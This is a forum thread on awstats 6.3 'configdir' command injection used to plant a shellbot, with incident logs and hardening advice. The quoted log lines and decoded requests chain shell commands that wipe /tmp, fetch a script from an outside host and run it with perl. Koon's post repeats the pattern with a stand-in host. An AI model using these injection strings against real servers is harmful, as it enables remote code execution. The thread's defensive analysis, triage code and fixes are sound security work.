hacked by shellbot [via awstats 6.3-r2][solved]


Re: shellcode used to propagate the shellbot

Post by kaidon » Mon Apr 11, 2005 9:08 pm

newtonian wrote:

Code: Select all

211.105.221.84 - - [31/Mar/2005:10:40:21 +0900] "GET /cgi-bin/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;killall%20-9%20perl;wget%20www \
.vpasp.go.ro/sess_3539283e27d73cae29fe2b80f9293f60;perl%20sess_3539283e \
27d73cae29fe2b80f9293f60;echo%20;echo| HTTP/1.1" 404 357 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98 )"
Putting the above request into a URL decoder gave me:

Code: Select all

Decoded Results: 211.105.221.84 - - [31/Mar/2005:10:40:21 0900] "GET 
/awstats/awstats.pl?configdir=|echo ;
cd /tmp;
rm -rf *;
killall -9 perl;
wget www.vpasp.go.ro/sess_3539283e27d73cae29fe2b80f9293f60;
perl sess_3539283e27d73cae29fe2b80f9293f60;echo ;
echo| HTTP/1.1" 200 604 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
What I also find a good idea on a server is to mount your /tmp directory like:

Code: Select all

tmpfs    /tmp    tmpfs    nodev,nosuid,noexec    0 0
# or, if you're short on RAM, a disk partition with the same options:
#/dev/hdaX    /tmp    ext3    nodev,nosuid,noexec    0 0
which would have prevented the perl script from being executed.

cheers
k

mod edit: inserted \ linebreak for formatting --Earthwings
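The decoding done by hand above is worth automating over a whole access_log. The following is an added example for this thread, not code from any of the posts: it extracts the configdir value from each logged request, URL-decodes it, flags values containing shell metacharacters and splits the injected chain into its individual commands. Two of the sample lines are copied from logs posted later in this thread; the other two are constructed benign requests using 192.0.2.x documentation addresses.

```python
"""Triage Apache access-log lines for awstats "configdir" command injection.

Added example for this thread, not code from any post. Pulls the configdir
value out of the logged request, URL-decodes it, and flags values that carry
shell metacharacters.
"""
import re
from urllib.parse import unquote, urlsplit

# Apache "combined" format: client ident user [time] "method target proto" status size "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Characters a configdir value never legitimately contains; all mean something to /bin/sh.
SHELL_META = re.compile(r'[|;&`$<>(){}\n]')


def extract_configdir(target):
    """Return the URL-decoded configdir value from a request target, or None."""
    query = urlsplit(target).query
    for part in query.split('&'):
        name, _, value = part.partition('=')
        if name.lower() == 'configdir':
            # Decode before inspecting so %7C / %3B encoded variants are caught too.
            return unquote(value)
    return None


def split_commands(payload):
    """Split an injected '|cmd1;cmd2;...|' value into its individual commands."""
    inner = payload.strip().strip('|')
    return [c.strip() for c in inner.split(';') if c.strip()]


def triage(line):
    """Describe the request if it carries an injected configdir, else return None."""
    m = LOG_RE.match(line)
    if not m or 'awstats.pl' not in m.group('target'):
        return None
    value = extract_configdir(m.group('target'))
    if value is None or not SHELL_META.search(value):
        return None
    return {
        'client': m.group('client'),
        'time': m.group('time'),
        # 200 means awstats.pl existed at that path and ran; 302/404 means the
        # scanner missed, which is why the scanners in this thread walk many paths.
        'status': int(m.group('status')),
        'configdir': value,
        'commands': split_commands(value),
    }


def scan(lines):
    """Triage every line and return only the hits, in log order."""
    return [hit for hit in map(triage, lines) if hit]


SAMPLE_LOG = [
    # probe: does the box run my command?  (copied from a log posted in this thread)
    '210.114.146.150 - - [13/Sep/2005:09:43:45 +0200] "GET //cgi-bin/awstats/awstats.pl'
    '?configdir=|%20id%20| HTTP/1.1" 302 389 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"',
    # download-and-run payload (copied from the same log)
    '203.114.64.241 - - [13/Sep/2005:10:29:00 +0200] "GET /awstats/awstats.pl?configdir='
    '|echo%20;cd%20/tmp;rm%20-rf%20*;wget%20http://80.53.220.138/.it/icet;perl%20icet;'
    'echo%20;rm%20-rf%20icet*;echo| HTTP/1.1" 200 787 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"',
    # constructed: legitimate awstats report request, no configdir at all
    '192.0.2.10 - - [13/Sep/2005:11:00:00 +0200] "GET /awstats/awstats.pl?config=example.org'
    '&output=main HTTP/1.1" 200 9001 "-" "Mozilla/5.0"',
    # constructed: unrelated request
    '192.0.2.11 - - [13/Sep/2005:11:01:00 +0200] "GET /index.html HTTP/1.1" 200 1234 "-" "Mozilla/5.0"',
]

if __name__ == '__main__':
    for hit in scan(SAMPLE_LOG):
        print(hit['time'], hit['client'], hit['status'], hit['commands'])
```

Run it over `zcat access_log.*.gz` output and sort the hits by status: the 200s are the paths where the script actually executed, and the command list tells you what to look for in /tmp.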

Re: shellcode used to propagate the shellbot

Post by newtonian » Wed Apr 13, 2005 2:41 pm

kaidon wrote: What I also find a good idea on a server is to mount your /tmp directory like:

Code: Select all

tmpfs    /tmp    tmpfs    nodev,nosuid,noexec    0 0
# or, if you're short on RAM, a disk partition with the same options:
#/dev/hdaX    /tmp    ext3    nodev,nosuid,noexec    0 0
which would have prevented the perl script from being executed.

cheers
k
Thanks for the advice, I'll add the line above to my /etc/fstab when access slows down and do a reboot.

I'm assuming that adding the above line won't have any effect on qmail, vpopmail, qmail-scanner or apache.
If not, I'm sure I'll find out soon enough.


Cheers,

Re: shellcode used to propagate the shellbot

Post by newtonian » Wed Apr 13, 2005 2:51 pm

Here's my current fstab:

Code: Select all

# <fs>                  <mountpoint>    <type>          <opts> <dump/pass>

/dev/sda1               /boot           ext2            noauto,noatime 1 1
/dev/sda3               /               ext3            noatime 0 0
/dev/sda2               none            swap            sw 0 0
/dev/cdroms/cdrom0      /mnt/cdrom      iso9660         noauto,ro 0 0
I've got partitions for boot, root and swap but nothing for tmp.
Do I need to re-partition my hard disk, or can I just add something to fstab to get it to work?

Code: Select all

tmpfs /tmp tmpfs nodev,nosuid,noexec 0 0
Cheers,

Post by kaidon » Wed Apr 13, 2005 4:41 pm

If you've got plenty of RAM you can mount your /tmp on a tmpfs filesystem.
In this case you don't need to alter any partition tables.
Depending on what apps you're running it'll also be quite a speed-up.

You may want to set the maximum size used for the tmpfs. It only uses the space it requires anyway (grows and shrinks as needed), but setting a max value prevents it from using up too much RAM.

Personally I like to have multiple partitions on a server.
Here's one of my /etc/fstab's as an example:

Code: Select all

/dev/hda1     /boot            ext2        noauto,noatime                                           1 2
/dev/hda2     none             swap        sw                                                       0 0
/dev/hda3     /                reiserfs    noatime,notail                                           0 1
/dev/hda5     /var             reiserfs    noatime,notail,nodev,nosuid                              0 0
/dev/hda6     /usr             reiserfs    noatime,notail,nodev,ro                                  0 0
/dev/hda7     /home            reiserfs    noatime,notail,nodev,nosuid                              0 0
/dev/hda8     /mnt/build       reiserfs    noauto,noatime,notail,nodev,nosuid                       0 0
/dev/hda9     /opt             reiserfs    noatime,notail,nodev,rw                                  0 0
/dev/hda10    /cvs             reiserfs    noatime,notail,nodev,nosuid                              0 0
#
none          /proc            proc        defaults                                                 0 0
none          /dev/shm         tmpfs       defaults                                                 0 0
tmpfs         /tmp             tmpfs       nodev,nosuid,noexec                                      0 0
# run amavisd-new temp directory on tmpfs
tmpfs         /var/amavis/tmp  tmpfs       defaults,nodev,nosuid,noexec,mode=700,uid=102,gid=2003   0 0
Recommended reading giving the above tips plus many more is
http://www.gentoo.org/doc/en/gentoo-security.xml

hth
cheers
Steven
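An fstab audit covering the options the layout above applies, as an added example for this thread (not code from any post). It reports, per mount point, which of nodev/nosuid/noexec are missing, a tmpfs without a size= cap (the RAM concern just mentioned), a /dev block device declared with type tmpfs (the commented-out alternative in the first post as originally written, which would not mount), and policy mount points that have no separate mount at all. POLICY is an assumed policy modelled on the fstab above; NEWTONIAN_FSTAB is the layout newtonian posts in this thread after adding the tmpfs line. One caveat to keep in mind: noexec makes the kernel refuse to execute a file on that mount directly, but `perl sess_...` in the original payload hands the file to an interpreter that reads it as data, which noexec does not stop. The mount options are still worth having; they just do not close the download-and-run pattern on their own.

```python
"""Audit /etc/fstab (or /proc/mounts, same first four fields) for the mount
hardening discussed in this thread.

Added example, not code from the posts. POLICY is an assumed policy modelled
on kaidon's fstab; adjust it to your own layout.
"""

# Mount point -> options that should be present.
POLICY = {
    '/tmp': {'nodev', 'nosuid', 'noexec'},
    '/dev/shm': {'nodev', 'nosuid', 'noexec'},
    '/var': {'nodev', 'nosuid'},
    '/home': {'nodev', 'nosuid'},
}


def parse_fstab(text):
    """Yield (device, mountpoint, fstype, options) for every active entry."""
    for raw in text.splitlines():
        line = raw.split('#', 1)[0].strip()   # drop comments and blank lines
        if not line:
            continue
        fields = line.split()
        if len(fields) < 4:
            continue
        device, mountpoint, fstype, opts = fields[:4]
        yield device, mountpoint, fstype, set(opts.split(','))


def audit(text, policy=POLICY):
    """Return a list of (mountpoint, finding) tuples; empty means the file passes."""
    findings = []
    seen = set()
    for device, mountpoint, fstype, opts in parse_fstab(text):
        seen.add(mountpoint)
        for opt in sorted(policy.get(mountpoint, set()) - opts):
            findings.append((mountpoint, f'missing {opt}'))
        if fstype == 'tmpfs':
            if device.startswith('/dev/'):
                # A block device cannot carry tmpfs; the mount would fail at boot.
                findings.append((mountpoint,
                                 f'block device {device} declared as tmpfs; use a disk filesystem type such as ext3'))
            if not any(o.startswith('size=') for o in opts):
                findings.append((mountpoint, 'tmpfs without size= cap can grow until RAM is exhausted'))
    for mountpoint in policy:
        if mountpoint not in seen:
            findings.append((mountpoint, 'no separate mount; options cannot be applied'))
    return findings


# Layout newtonian posts in this thread after adding the tmpfs line.
NEWTONIAN_FSTAB = """\
# <fs>                  <mountpoint>    <type>          <opts>                  <dump/pass>
/dev/sda1               /boot           ext2            noauto,noatime          1 1
/dev/sda3               /               ext3            noatime                 0 0
/dev/sda2               none            swap            sw                      0 0
/dev/cdroms/cdrom0      /mnt/cdrom      iso9660         noauto,ro               0 0
tmpfs                   /tmp            tmpfs           nodev,nosuid,noexec     0 0
none                    /proc           proc            defaults                0 0
none                    /dev/shm        tmpfs           defaults                0 0
"""

# Constructed: the commented-out alternative from the first post, made active as first written.
BAD_TMP_LINE = "/dev/hdaX    /tmp    tmpfs    nodev,nosuid,noexec    0 0\n"

if __name__ == '__main__':
    for mountpoint, finding in audit(NEWTONIAN_FSTAB):
        print(f'{mountpoint}: {finding}')
```

Because /proc/mounts uses the same first four fields, `audit(open('/proc/mounts').read())` checks what is actually mounted rather than what fstab declares, which matters if a remount has dropped options.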

Permission denied

Post by newtonian » Wed Apr 13, 2005 5:53 pm

kaidon wrote: If you've got plenty of RAM you can mount your /tmp on a tmpfs filesystem.
In this case you don't need to alter any partition tables.
Depending on what apps you're running it'll also be quite a speed-up.

You may want to set the maximum size used for the tmpfs. It only uses the space it requires anyway (grows and shrinks as needed), but setting a max value prevents it from using up too much RAM.

hth
cheers
Steven
My server access slowed down so I added the single line you suggested and rebooted:

Code: Select all

tmpfs    /tmp    tmpfs    nodev,nosuid,noexec    0 0
now my fstab looks like this:

Code: Select all

# <fs>                  <mountpoint>    <type>          <opts>                  <dump/pass>
# NOTE: If your BOOT partition is ReiserFS, add the notail option to opts.
/dev/sda1               /boot           ext2            noauto,noatime          1 1
/dev/sda3               /               ext3            noatime                 0 0
/dev/sda2               none            swap            sw                      0 0
/dev/cdroms/cdrom0      /mnt/cdrom      iso9660         noauto,ro               0 0
tmpfs    /tmp    tmpfs    nodev,nosuid,noexec    0 0
none                    /proc           proc            defaults                0 0
none                    /dev/shm        tmpfs           defaults                0 0
I tested to see if I could run executables from the tmp directory.

Code: Select all

hawk tmp # cd /tmp
hawk tmp # cat david.hack
#!/bin/sh
echo 'I am runnable'
hawk tmp # ls -l david.hack
-rwxrwxr-x  1 root root 30 Apr 14 02:34 david.hack
hawk tmp # whoami
root
hawk tmp # ./david.hack
-bash: ./david.hack: Permission denied
I couldn't :D

I made sure mail and apache were working ok and everything tested out fine.
I'm all set. Thanks for the useful advice!

Post by Koon » Fri Apr 15, 2005 1:37 pm

awstats 6.3-r2 includes 6.4-based patches that fix the configdir problem :

Code: Select all

if ($QueryString =~ /configdir=([^&]+)/i)
   { $DirConfig=&Sanitize(&DecodeEncodedString("$1")); }
with:

Code: Select all

sub Sanitize {
    my $stringtoclean=shift;
    my $full=shift||0;
    if ($full) {
        $stringtoclean =~ s/[^\w]//g;
    } else {
        $stringtoclean =~ s/[^\w\-\\\/\.:\s]//g;
    }
    return $stringtoclean;
}
So the "|echo ;cd /tmp;wget www.hacker.com/badscript;echo ;echo|" would get stripped of the | and ; and therefore be harmless.

My guess is that the awstats.pl in your cgi-bin wasn't an updated version. Awstats is a webapp-config enabled package, so it requires you to deploy it after installation on your virtual hosts (using webapp-config). If you don't, you may have lying around an old vulnerable awstats.pl in cgi-bin...

-K
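The Sanitize() quoted above ported to Python and run on the decoded payload Koon gives, as an added example (not awstats code). Why stripping the `|` is what makes it harmless: awstats built the config-file path from $DirConfig by string concatenation and passed it to Perl's two-argument open(), and a two-argument open() whose target starts with `|` runs the rest as a shell command and pipes into it. open_mode() reproduces just that rule so the raw and sanitized paths can be compared; `/awstats.example.conf` is an assumed stand-in for the suffix awstats appends.

```python
"""Python port of the awstats 6.4 Sanitize() quoted in the post above.

Added example, not awstats code. open_mode() mirrors only the pipe rule of
Perl's two-argument open(); the '<', '>' and '>>' prefixes are left out.
"""
import re

# Perl's s/[^\w]//g and s/[^\w\-\\\/\.:\s]//g with ASCII \w, as in awstats 6.4.
_FULL = re.compile(r'[^\w]', re.ASCII)
_LOOSE = re.compile(r'[^\w\-\\/.:\s]', re.ASCII)


def sanitize(value, full=False):
    """Strip everything the awstats 6.4 Sanitize() strips."""
    return (_FULL if full else _LOOSE).sub('', value)


def open_mode(name):
    """Classify a two-argument Perl open() target: pipe-write, pipe-read or file."""
    name = name.strip()
    if name.startswith('|'):
        return 'pipe-write'     # open(FH, "|cmd"): runs cmd, FH writes to its stdin
    if name.endswith('|'):
        return 'pipe-read'      # open(FH, "cmd|"): runs cmd, FH reads its stdout
    return 'file'


# Decoded payload quoted in the post above.
PAYLOAD = '|echo ;cd /tmp;wget www.hacker.com/badscript;echo ;echo|'
CONF_SUFFIX = '/awstats.example.conf'   # assumed stand-in for what awstats appends


def before_and_after(payload=PAYLOAD):
    """Return (open mode of the raw path, open mode of the sanitized path, sanitized value)."""
    raw_path = payload + CONF_SUFFIX
    clean = sanitize(payload)
    return open_mode(raw_path), open_mode(clean + CONF_SUFFIX), clean


if __name__ == '__main__':
    raw_mode, clean_mode, clean = before_and_after()
    print('raw      :', raw_mode)
    print('sanitized:', clean_mode, repr(clean))
```

The loose form keeps whitespace, `/`, `.`, `:`, `-` and `\`, so a sanitized value is still a usable directory path; what is gone is everything the shell would interpret. The full form (`$full` set) keeps only word characters.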

Post by linux_girl » Wed Oct 05, 2005 6:13 pm

Holy crap, me too:

Code: Select all


zcat /var/log/apache2/access_log.1.gz |grep awstats.pl|grep configdir

 210.114.146.150 - - [13/Sep/2005:09:43:45 +0200] "GET
//cgi-bin/awstats/awstats.pl?configdir=|%20id%20| HTTP/1.1" 302 389 "-"
"Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"  
 MY-IP 210.114.146.150 - - [13/Sep/2005:09:43:45 +0200] "GET
//cgi-bin/awstats/awstats.pl?configdir=|%20id%20| HTTP/1.1" 302 389  
 210.114.146.150 - - [13/Sep/2005:09:43:47 +0200] "GET
//cgi-bin/awstats.pl?configdir=|%20id%20| HTTP/1.1" 302 381 "-" "Mozilla/4.0
(compatible; MSIE 6.0; Windows 98)"  
 MY-IP 210.114.146.150 - - [13/Sep/2005:09:43:47 +0200] "GET
//cgi-bin/awstats.pl?configdir=|%20id%20| HTTP/1.1" 302 381  
 210.114.146.150 - - [13/Sep/2005:09:43:48 +0200] "GET
//cgi/awstats.pl?configdir=|%20id%20| HTTP/1.1" 302 377 "-" "Mozilla/4.0
(compatible; MSIE 6.0; Windows 98)"  
 MY-IP 210.114.146.150 - - [13/Sep/2005:09:43:48 +0200] "GET
//cgi/awstats.pl?configdir=|%20id%20| HTTP/1.1" 302 377  
 210.114.146.150 - - [13/Sep/2005:09:43:50 +0200] "GET
//awstats/awstats.pl?configdir=|%20id%20| HTTP/1.1" 302 381 "-" "Mozilla/4.0
(compatible; MSIE 6.0; Windows 98)"  
 MY-IP 210.114.146.150 - - [13/Sep/2005:09:43:50 +0200] "GET
//awstats/awstats.pl?configdir=|%20id%20| HTTP/1.1" 302 381  
 203.114.64.241 - - [13/Sep/2005:10:28:58 +0200] "GET
//awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;wget%20http://80.53.220.
138/.it/icet;perl%20icet;echo%20;rm%20-rf%20icet*;echo| HTTP/1.1" 302 502 "-"
"Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"  
 MY-IP 203.114.64.241 - - [13/Sep/2005:10:28:58 +0200] "GET 
//awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;wget%20http://80.53.220.
138/.it/icet;perl%20icet;echo%20;rm%20-rf%20icet*;echo| HTTP/1.1" 302 502
 203.114.64.241 - - [13/Sep/2005:10:28:59 +0200] "GET 
/cgi-bin/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;wget%20http://80.
53.220.138/.it/icet;perl%20icet;echo%20;rm%20-rf%20icet*;echo| HTTP/1.1" 302 510
"-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
 MY-IP 203.114.64.241 - - [13/Sep/2005:10:28:59 +0200] "GET
/cgi-bin/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;wget%20http://80.
53.220.138/.it/icet;perl%20icet;echo%20;rm%20-rf%20icet*;echo| HTTP/1.1" 302 510
 
 203.114.64.241 - - [13/Sep/2005:10:29:00 +0200] "GET 
/awstats/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;wget%20http://80.
53.220.138/.it/icet;perl%20icet;echo%20;rm%20-rf%20icet*;echo| HTTP/1.1" 200 787
"-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
 MY-IP 203.114.64.241 - - [13/Sep/2005:10:29:00 +0200] "GET 
/awstats/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;wget%20http://80.
53.220.138/.it/icet;perl%20icet;echo%20;rm%20-rf%20icet*;echo| HTTP/1.1" 200 787
 203.114.64.241 - - [13/Sep/2005:10:29:01 +0200] "GET 
/cgi/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;wget%20http://80.53.
220.138/.it/icet;perl%20icet;echo%20;rm%20-rf%20icet*;echo| HTTP/1.1" 302 506
"-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" 
 MY-IP 203.114.64.241 - - [13/Sep/2005:10:29:01 +0200] "GET
/cgi/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;wget%20http://80.53.
220.138/.it/icet;perl%20icet;echo%20;rm%20-rf%20icet*;echo| HTTP/1.1" 302 506  
 203.114.64.241 - - [13/Sep/2005:10:29:02 +0200] "GET 
/awstats.pl/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;wget%20http://
80.53.220.138/.it/icet;perl%20icet;echo%20;rm%20-rf%20icet*;echo| HTTP/1.1" 200 
787 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" 
 MY-IP 203.114.64.241 - - [13/Sep/2005:10:29:02 +0200] "GET 
/awstats.pl/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;wget%20http://
80.53.220.138/.it/icet;perl%20icet;echo%20;rm%20-rf%20icet*;echo| HTTP/1.1" 200
787
 203.114.64.241 - - [13/Sep/2005:10:29:04 +0200] "GET 
/stats/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;wget%20http://80.53.
220.138/.it/icet;perl%20icet;echo%20;rm%20-rf%20icet*;echo| HTTP/1.1" 302 508
"-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
 MY-IP 203.114.64.241 - - [13/Sep/2005:10:29:04 +0200] "GET 
/stats/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;wget%20http://80.53.
220.138/.it/icet;perl%20icet;echo%20;rm%20-rf%20icet*;echo| HTTP/1.1" 302 508
 203.114.64.241 - - [13/Sep/2005:10:29:05 +0200] "GET 
/stats/awstats/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;wget%20http:
//80.53.220.138/.it/icet;perl%20icet;echo%20;rm%20-rf%20icet*;echo| HTTP/1.1"
302 516 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
 MY-IP 203.114.64.241 - - [13/Sep/2005:10:29:05 +0200] "GET 
/stats/awstats/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;wget%20http:
//80.53.220.138/.it/icet;perl%20icet;echo%20;rm%20-rf%20icet*;echo| HTTP/1.1"
302 516
 203.114.64.241 - - [13/Sep/2005:10:29:06 +0200] "GET 
/stats/cgi-bin/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;wget%20http:
//80.53.220.138/.it/icet;perl%20icet;echo%20;rm%20-rf%20icet*;echo| HTTP/1.1"
302 516 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
 MY-IP 203.114.64.241 - - [13/Sep/2005:10:29:06 +0200] "GET 
/stats/cgi-bin/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;wget%20http:
//80.53.220.138/.it/icet;perl%20icet;echo%20;rm%20-rf%20icet*;echo| HTTP/1.1"
302 516

1) The exploit is no longer available. Just wondering what it did on my server.
2) Just wondering how the hell they knew about my awstats setup. I mean, you can't find my awstats URL on any search engine!

mod edit: inserted line breaks in code block for page formatting --Earthwings
:D :D

me too

Post by newtonian » Thu Oct 06, 2005 12:30 am

linux_girl wrote:holly crap me too :

1) The exploit is no longer available. Just wondering what it did on my server.
2) Just wondering how the hell they knew about my awstats setup. I mean, you can't find my awstats URL on any search engine!
1) Did you have an IRC server running on your system? If you did, the attackers may have been able to do more harm.

You should check for a rootkit and I'd recommend changing your tmp directory so that files in tmp are no longer executable from within /tmp. You can find directions for both in this post.

2) I don't know about the script that attacked your system, but it is very easy to have a script attack random IP addresses.
That, or maybe it was a previous or current user of your system. Or maybe there was a short period when your awstats setup was exposed and some web bot added your address and awstats link to a search engine.


Cheers,

Re: me too

Post by linux_girl » Thu Oct 06, 2005 3:18 am

newtonian wrote:
linux_girl wrote:holly crap me too :

1) The exploit is no longer available. Just wondering what it did on my server.
2) Just wondering how the hell they knew about my awstats setup. I mean, you can't find my awstats URL on any search engine!
1) Did you have an IRC server running on your system? If you did, the attackers may have been able to do more harm.

You should check for a rootkit and I'd recommend changing your tmp directory so that files in tmp are no longer executable from within /tmp. You can find directions for both in this post.

2) I don't know about the script that attacked your system, but it is very easy to have a script attack random IP addresses.
That, or maybe it was a previous or current user of your system. Or maybe there was a short period when your awstats setup was exposed and some web bot added your address and awstats link to a search engine.
Cheers,
ANALYSIS of the break-in

WEIRD files owned by apache
The following files were all created by apache and don't match any
GET activity in /var/log/apache/access.
I remember cleaning /tmp/ from time to time => removing the hacker's files, DAMN IT :(
Code: Select all

find / -group 81 -exec ls -gl '{}' \;
-rw-------  1 apache apache 2,1K sep 24 21:43 /tmp/sess_0569b807f3b1ee0f443ac4f703090435
-rw-------  1 apache apache   28 sep 20 21:53 /tmp/sess_0cf9d59765d44c71595229508aa4ad4c
-rw-------  1 apache apache    0 sep 21 21:21 /tmp/sess_2772093e5a5336a86386a86374cc0d24
-rw-------  1 apache apache  16K sep 27 10:32 /tmp/sess_3d0b8822f43dd7b5ec3a2092f1d1d402
-rw-------  1 apache apache    7 sep 11 11:41 /tmp/sess_62717f9c3a213dba20a89d94c84af0cf
-rw-------  1 apache apache 2,0K sep 14 04:24 /tmp/sess_8906480466f77adf635dea22987e2169
-rw-------  1 apache apache   78 sep 26 14:46 /tmp/sess_9995800ef00b8bb382ccfd3f0a72ff1c
-rw-------  1 apache apache 2,0K sep 19 19:04 /tmp/sess_bc5702670760d3014810079849809a56
-rw-------  1 apache apache    7 sep 25 19:26 /tmp/sess_bd4ec9e8c0d1c943e4ffbcbf5b2c63ce
-rw-------  1 apache apache    7 oct  1 18:13 /tmp/sess_c3f7c383478793804b15d272cd21834f
-rw-------  1 apache apache 2,0K sep 18 02:23 /tmp/sess_d486648c6a3f8dc0b9fa7612002c42ea
-rw-------  1 apache apache   78 sep 26 14:46 /tmp/sess_d6e3c88f8754240d4010bc8e7672a60d
-rw-------  1 apache apache    7 oct  1 17:05 /tmp/sess_d7d34a92d14fbf09af900f97fe6e761c
-rw-------  1 apache apache    7 sep 27 23:08 /tmp/sess_e0e884fe36e1ddc25852ccb354f6b9ea
-rw-------  1 apache apache 2,0K sep 15 19:15 /tmp/sess_e4c5c058f61fcfb41cf48735a73a7f6d
-rw-------  1 apache apache    7 sep 29 13:27 /tmp/sess_f742e0a34a022894388793c5bdbda19c
-rw-------  1 apache apache    7 oct  1 17:30 /tmp/sess_fd3587d62383ae5badfcad12c70ca359
SOME INBOX

Code: Select all

cat /tmp/sess_3d0b8822f43dd7b5ec3a2092f1d1d402
sq_base_url|s:27:"http://webmail.MY_APACHE_SERVER.COM";base_uri|s:1:"/";onetimepad|s:12:
"AhobV7wnT9o=";sqimap_capabilities|a:12:{s:9:"IMAP4rev1";b:1;s:7:"UIDPLUS";b:1;s:8:"CHILDREN";b:1;s:9:"NAMESPACE";b:1;s:6: \
"THREAD";s:10:
"REFERENCES";s:4:
"SORT";b:1;s:5:"QUOTA";b:1;s:4:"IDLE";b:1;s:4:"AUTH";s:5:"PLAIN";s:3:"ACL";b:1;s:4:"ACL2"; \
s:5:"UNION";s:14:
"XCOURIEROUTBOX";
s:14:"INBOX.Outbox
";}delimiter|s:1:".";username|s:5:"pbx06";user_is_logged_in|b:1;just_logged_in|b:0;
attachment_common_types|a:6:{s:9:"text/html";b:1;s:10:"image/jpeg";b:1;s:9:"image/png";b:1;s:6:"text/*";b:1;s:7: \
"image/*";b:1;s:3:"*/*";b:1;}
attachment_common_types_parsed|a:0:{}prefs_cache|a:7:{s:17:"show_html_default";s:1:"0";s:4:"sort"; \
s:1:"0";s:13:"javascript_on";s:1:"1";s:8:"hililist";s:6:
"a:0:{}";s:12:"chosen_theme";s:24:"../themes/dark_green.php";s:10:"custom_css";s:14:"verdana-10.css"
;s:8:"show_num";s:2:"30";}
prefs_are_cached|b:1;theme_css|s:0:"";boxesnew|a:30:{i:0;a:7:
{s:3:"raw";s:45:"* LIST (\Unmarked \HasChildren) "." "INBOX"
";s:9:"formatted";s:5:"INBOX";s:14:"unformatted-dm";s:5:"INBOX";s:11:"unformatted";s:5:
"INBOX";s:16:"unformatted-disp";s:5:
"INBOX";s:2:"id";i:0;s:5:"flags";a:2:{i:0;s:8:"unmarked";i:1;s:11:"haschildren";}}i:1;a:7:
{s:3:"raw";s:44:"* LIST (\HasNoChildren) "." "INBOX.Drafts"
";s:9:"formatted";s:18:"&nbsp;&nbsp;Drafts";s:14:"unformatted-dm";s:12:"INBOX.Drafts";s:11:"unformatted";s:12:
"INBOX.Drafts";s:16:"unformatted-disp";s:12:"INBOX.Drafts";s:2:"id";i:5;s:5:
"flags";a:1:{i:0;s:13:"hasnochildren";}}i:2;a:7:
{s:3:"raw";s:42:"* LIST (\HasNoChildren) "." "INBOX.Sent"
";s:9:"formatted";s:16:"&nbsp;&nbsp;Sent";s:14:"unformatted-dm";s:10:"INBOX.Sent";s:11:"unformatted";s:10:
"INBOX.Sent";s:16:"unformatted-disp";s:10:"INBOX.Sent";s:2:"id";i:19;s:5:"flags";a:1:
{i:0;s:13:"hasnochildren";}}i:3;a:7:{s:3:"raw";s:43:"* LIST (\HasNoChildren) "." "INBOX.Trash"
";s:9:"formatted";s:17:"&nbsp;&nbsp;Trash";s:14:"unformatted-dm";s:11:"INBOX.Trash";s:11:"unformatted";s:11:
"INBOX.Trash";s:16:"unformatted-disp";s:11:"INBOX.Trash";s:2:"id";i:26;s:5:"flags";a:1:
{i:0;s:13:"hasnochildren";}}i:4;a:7:{s:3:"raw";s:51:"* LIST (\HasNoChildren) "." "INBOX.nature
.
.
.
SOME sensitive info like senders' mail addresses, to be used for spam mailing
.
.
.

The above looks like the SquirrelMail webmail front end, but it can't be!

Code: Select all

cat /tmp/sess_0569b807f3b1ee0f443ac4f703090435
DATA|a:4:{i:2;a:44:{i:0;i:0;i:1;i:0;i:2;i:0;i:3;i:0;i:4;i:0;i:5;i:0;i:6;i:0;i:7;i:0;i:8;i:0;i:9;i:0;i:10;i:0;i:11
;i:0;i:12;i:12;i:13;i:16;
i:14;i:11;i:15;i:15;i:16;i:26;i:
17;i:22;i:18;i:33;i:19;i:34;i:20;i:36;i:21;i:30;i:22;i:20;i:23;i:16;i:24;i:15;i:25;i:27;i:26;i:23;i:27;i:17;i:
28;i:18;i:29;i:19;i:30;i:22;i:31;i:
16;i:32;i:23;i:33;i:19;i:34;i:18;i:35;i:18;i:36;i:26;i:37;i:31;i:38;i:17;i:39;i:15;i:40;i:24;i:41;i:17;i:42;i:
15;i:43;i:33;}i:1;a:44:{i:0;i:0;i:1;i:0;i:2;i:0;i:3;i:0;i:4;i:0;i:5;i:0;i:6;i:0;i:7;i:0;i:8;i:0;i:9;i:0;i:10;i:0;i:
11;i:0;i:12;i:12;i:13;i:16;
i:14;i:11;i:15;i:15;i:16;i:26;
i:17;i:22;i:18;i:33;i:19;i:34;i:20;i:36;i:21;i:30;i:22;i:20;i:23;i:16;i:24;i:15;i:25;i:27;i:26;i:23;i:27;i:17;
